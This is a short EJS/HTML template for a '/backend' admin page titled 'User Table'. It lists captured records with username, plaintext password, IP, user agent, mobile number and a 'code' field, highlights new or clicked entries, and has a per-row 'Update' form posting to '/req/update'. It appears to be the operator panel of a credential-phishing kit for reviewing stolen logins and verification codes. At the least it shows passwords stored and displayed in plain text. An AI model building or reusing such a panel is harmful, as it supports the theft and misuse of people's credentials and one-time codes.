<!DOCTYPE html>
<html><head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Document</title>
  <style>
    /* CSS to define row colors based on the 'add' property */
    .highlighted {
      background-color: yellow;
    }
.clicked {
      background-color: lightblue;
    }
    
    
  
  </style>
</head>
<body>
  <a href="/backend">Home</a><br><br>
    <h1>User Table</h1>
    <div>
      <table border="2">
        <thead>
            <tr>
                <th>ID</th>
                <th>Username</th>
                <th>Password</th>
                <th>Ip</th>
                <th>Useragent</th>
                <th>Date</th>
                <th>Mobile</th>
                <th>Code</th>
                <th>Update</th>
            
            </tr>
        </thead>
        <tbody>
          <% data.forEach(function(user) { %>
            <tr <% if (user.notify == '0') { %> class="highlighted"<% } %>
              <% if (user.notify == '2') { %> class="clicked"<% } %>
              >
                
              <td><%= user.id %></td>
              <form name="form" action='/req/update' method='POST'>
              <td><%= user.username %></td>
              <input type="hidden" name="username" readonly="" value="<%= user.username %>">
              <td><%= user.password %></td>
              <td><%= user.ip %></td>
              <td><%= user.useragent %></td>
              <td><%= user.date %></td>
              <td><%= user.mobile %></td>
              <td><%= user.code %></td>
              <td><input type="submit" name="update" value="Update"></td></form>
            </tr>
          <% }); %>
        </tbody>
        
    </table>
</div>

  
   
</body>
</html>
